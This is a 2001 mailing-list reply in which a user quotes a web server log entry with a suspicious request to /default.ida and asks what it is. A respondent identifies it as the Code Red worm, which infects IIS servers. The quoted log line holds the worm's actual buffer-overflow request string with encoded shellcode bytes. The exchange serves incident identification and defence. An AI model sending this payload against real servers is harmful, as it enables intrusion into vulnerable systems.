Re: CGI Buffer Overflow?
On Thu, 19 Jul 2001, Brian Rectanus wrote:
> Anyone seen this before? I have looked around for similar attacks, but
> cannot find any info. I assume that is a unicode string padded out with
> Ns. How would I go about finding out what is in the string?
>
>
> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a HTTP/1.0" 400 328
Code Red Worm. See BUGtraq (and many other lists and websites) for more
information. The worm only infects IIS servers (and possibly crashes some
routers and printers with bad http implementations).
--
Tot ziens,
Bart-Jan
Reply to: